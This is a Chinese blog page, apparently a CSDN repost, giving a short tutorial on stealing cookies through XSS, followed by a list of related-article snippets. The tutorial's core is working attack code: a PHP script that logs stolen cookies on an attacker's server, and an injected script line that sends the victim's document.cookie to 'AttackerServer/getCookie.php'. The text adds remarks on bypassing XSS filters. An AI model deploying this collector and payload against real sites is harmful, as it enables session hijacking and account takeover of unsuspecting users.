简单的cookie盗取

最新推荐文章于 2024-03-29 00:11:23 发布
最新推荐文章于 2024-03-29 00:11:23 发布
阅读量752 收藏 2
点赞数
文章标签: php javascript ViewUI
原文链接:http://www.cnblogs.com/zlgxzswjy/p/6443336.html
版权

此文需要有一定的javascript\html\php方面的只是作为基础

直接上代码:

#用于抓取盗窃来的cookie的php文件,此文件需置于攻击者的服务器上,这里包含了两种写法:Method1和Method2
#保存为getCookie.php
<?php  

#Method 1

// $info=getenv("QUERY_STRING");
// if ($info) 
// {
// 	# code...
// 	$info=urldecode($info);
// 	$fp=fopen("info.txt","a");
// 	fwrite($fp,$info."\n\n\n\n");
// 	fclose($fp);
// }


#Method2

$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log); 

?>

 接下来需要再被攻击者的服务器页面上注入一段javascript代码,用于将被攻击者的cookie传送到我们的服务器上

<script>
document.location='http://AttackerServer/getCookie.php?cookie='+document.cookie;
</script>

当被攻击者的浏览器加载了被恶意注入的代码后,就会向攻击者的服务器发送自己的cookie,从而达到了盗取用户cookie的目的

*注:当你浏览某个需要登陆的页面(比如论坛)时,在登录之后,把地址栏清空后在地址栏里写入javascript:alert(document.cookie)。你就会看到这个登陆页面在你计算机里保存的cookie。

 

解析:

可以看到,两种方法写的盗取cookie的攻击者脚本并不难,仅仅只做了一个接收参数,保存为文件的工作。

cookie盗取真正难的部分应该还是在于,如何向被攻击者的页面注入这段javascript脚本。这就要借助XSS跨站脚本攻击的一些手法,在对方管理员做了严格限制的情况下,需要想办法绕过XSS的过滤,才能使我们的cookie盗取奏效。

转载于:https://www.cnblogs.com/zlgxzswjy/p/6443336.html

weixin_30940783
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JS设置Cookie,及COOKIE的限制
05-19 1万+
 在Javascript脚本里,一个cookie 实际就是一个字符串属性。当你读取cookie的值时,就得到一个字符串,里面当前WEB页使用的所有cookies的名称和值。每个cookie除了 name名称和value值这两个属性以外,还有四个属性。这些属性是: expires过期时间、 path路径、 domain域、以及 secure安全。Expires – 过期时间。指定cookie的生
ie7下利用ajax跨域盗取cookie的解决办法
10-30
网上的很多文章提到的利用ajax盗取cookie的代码经我测试不可行。
Cookie窃取和Session劫持
yy19890521的博客
08-08 4045
原文地址:http://www.2cto.com/Article/201411/355266.html 一、cookie的基本特性 如果不了解cookie,可以先到 wikipedia 上学习一下。 http request 浏览器向服务器发起的每个求都会带上cookie: Host: www.example.org Cookie: foo=value1;bar=value2 Ac...
XSS 盗取 Cookie 实验
m0_63645854的博客
04-01 375
本文主要介绍了XSS盗取Cookie流程
使用xss钓鱼盗取用户cookie
m0_74805513的博客
07-27 981
那么可以看到第一步写入成功了,将cookie写入了我们事先建立好的网站,并且保存了下来,我们在点开gtck.html 去更加细致的查看里面是否有我们保存的cookie。这行代码也很简单,就是加载后转到我们搭建的web网页,向我们的网页传入用户的cookie,document.location='url'起到页面加载后转到。很简单的一个网页主要用来接收用户cookie,然后写入gtck.html文件里,然后我们在创建gtck.html文件,用来保存用户cookie
XSS实现cookie盗取
一期一会的博客
04-08 1017
XSS实现cookie盗取 在一台win7上搭建xss,另外一台搭建留言板(一个网站),两台虚拟机之间能够ping通,在留言板上留言,管理员回复留言,xss上获取到cookie,利用中国菜刀通过获取的cookie用管理员账号登录。 实验环境: ​ Windows 7 192.168.1.128 (搭建xss) ​ Windows 7 192.168.1.100 (安装小旋风) xss平台搭建好以后,进入管理员账户,复制邀码,退出登录,利用邀码重新注册一个test11的账户
第二节 XSS盗取cookie-01
09-15
XSS盗取cookie详解 在Web安全领域中,XSS(Cross-Site Scripting)是一种常见的攻击手法,通过inject恶意脚本来盗取用户的Cookie信息。下面我们将详细介绍XSS盗取cookie的攻击原理、实施方法和防御策略。 Cookie...
桂林老兵cookie欺骗工具
10-11
然而,Cookie欺骗是一种攻击手段,攻击者通过篡改或伪造受害者的Cookie来冒充用户身份,进行非法活动,例如盗取账户信息、执行未授权操作等。桂林老兵Cookie欺骗工具就是这样一个能够帮助安全专家模拟这种攻击场景的...
关于cookie
12-02
ppt介绍了cookie的基本知识,cookie欺骗产生的原理,跨站脚本攻击盗取Cookie,以及Cookie的安全对策
网络安全学习笔记——盗取Cookies跨站脚本(XSS)
just do it
07-24 1351
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
Day54:WEB攻防-XSS跨站&Cookie盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
qq_61553520的博客
03-29 1414
小迪安全-Day54:WEB攻防-XSS跨站&Cookie盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
XSS平台偷取cookie使用+XSS漏洞
NSQ0207的博客
07-24 2499
在线利用网站:复制代码输入复制的代码查看获取到的cookie二、xss触发方式(1)在标签外:(2)在标签内:使用事件型:(先用引号闭合,看看是否有过滤如果有使用大小写试验)在标签内不能使用标签,使用标签标签内资源类型是url使用伪协议。
防止cookie被盗用
AlgorithmHero的博客
08-21 810
在设置 Cookie 时,使用 HttpOnly 标志可以防止 JavaScript 访问 Cookie,从而减少 XSS 攻击的风险。在设置 Cookie 时,使用 HttpOnly 标志可以防止 JavaScript 访问 Cookie,从而减少 XSS 攻击的风险。通过设置 Cookie 的 Domain 属性,可以限制 Cookie 只在特定的域名下有效,减少跨站点攻击的风险。尽量避免使用过于宽泛的域名。在开发应用时,采用安全的编码和开发实践,以减少漏洞的可能性,包括 XSS 和 CSRF 攻击。
盗用cookie的目的和防盗cookie的手段
ITWANGBOIT的博客
10-27 9946
前提 虽然通过使用springsecurity我们防御了会话固定攻击,但是如果黑客等待合法用户登录系统之后,再从合法用户浏览器中拿到名字为JSESSIONID的cookie,然后放入黑客自己的浏览器的cookie中,这样以来当黑客带着盗窃来的JSESSIONID访问系统时,后端系统会根据JSESSIONID找到对应的session,就会把该次求当成是认证通过的用户发送的求;这样黑客就可以为所欲为了。 实践 如下图: 经过上图的实践,证明我的分析是合理的,只要能拿到认证通过的用户的cook
TOP16-XSS -- 小黑超细详解-+案例说明(盗取cookie登录)<宝藏文>
G_WEB_Xie的博客
04-03 1287
概念:通常指通过HTML注入篡改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。当入侵网站后,通过自己编定的脚本或者木马嵌入到网站页面,利用网站的流量将自己的网页木马传播出去从而达到自己的目的,当用户浏览网站的时候点击了编订的恶意程序脚本,从而达到获取用户信息,进行一系列未授权的操作。通俗理解:此漏洞主要以盗取用户信息, 获取用户的权限做一些越权操作,还可以结合其它漏洞进行一系列的攻击行为。
WEB攻防-XSS跨站&Cookie盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
siu~
09-10 561
1、XSS跨站-攻击利用-凭据盗取 2、XSS跨站-攻击利用-数据提交 3、XSS跨站-攻击利用-网络钓鱼 4、XSS跨站-攻击利用-溯源综合
cookie劫持
qq_41048303的博客
08-15 1158
pikachu靶场—cookie劫持 一.劫持的原理 ​ 利用XSS漏洞,对存在漏洞的位置进行测试,并写出payload。 ​ 将构造好的链接发送给用户,用户点击后就会将自己的cookie发送到攻击者提前布好的网站。 ​ 这次使用的是pikachu靶场,里面就存在着XSS相关的漏洞。 二、劫持的过程 环境说明 服务器: windows 7(pikachu靶场) IP:192.168.254.136 用户: windows 10 IP:192.
“黑客”入门学习之“Cookie技术详解”
Python栈_基的博客
03-01 1478
"重放攻击"大家应该听说过吧?重放攻击时黑客常用的攻击方式之一,攻击者发送一个目的主机已接收过的包,来达到欺骗系统的目的,主要用于身份认证过程,破坏认证的正确性。这种攻击会不断恶意或欺诈性地重复一个有效的数据传输,重放攻击可以由发起者,也可以由拦截并重发该数据的敌方进行。攻击者利用网络监听或者其他方式盗取认证凭据,之后再把它重新发给认证服务器。重放攻击监听http数据传输的截获的敏感数据大多数就是存放在Cookie中的数据。在web安全中的通过其他方式(非网络监听)盗取Cookie与提交Cookie也是一种
简析小黑是如何盗取cookie登录用户账号
dodoing的博客
05-21 1789
都说cookie不安全,现在通过一个很简单的例子来说明它为什么不安全。 对于cookie的概念这里就不做阐述了。前端截取cookie的方式有多种,下面介绍一种比较简单的手法。 首先: 小黑会在各种网站发布帖子,然后在某些特定的地方添加吸引人点击的内容,而该内容会有一些超链接。比如在A网站,小黑在发布的内容中加个超链接: <a href=”JS_URL” target=”_blan...
pikachu盗取cookie
最新发布
06-28
Pikachu是日本任天堂公司经典游戏系列《宝可梦》中的角色,它是一只电气属性的可爱精灵,以其标志性电击能力和可爱的形象深受玩家喜爱。"盗取cookie"这个词组通常和网络浏览器中的cookies概念相关,但与Pikachu关联不大,因为它是游戏角色,不是黑客或网络行为者。 Cookies在网站中是一个小的数据文件,通常用于存储用户的登录信息、浏览偏好等。如果谈到Pikachu与cookies的关系,可能是指某些游戏或网络互动中,Pikachu扮演了某种角色,比如在某些基于互联网的游戏中,玩家可能会让游戏内的Pikachu模拟点击网页,但这并不是现实世界中Pikachu的行为,而是一种游戏设计或剧情元素。 如果你想了解的是关于网络安全或防止cookies被盗用的建议,那可能需要咨询网络安全专家或查阅相关的网络安全教程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值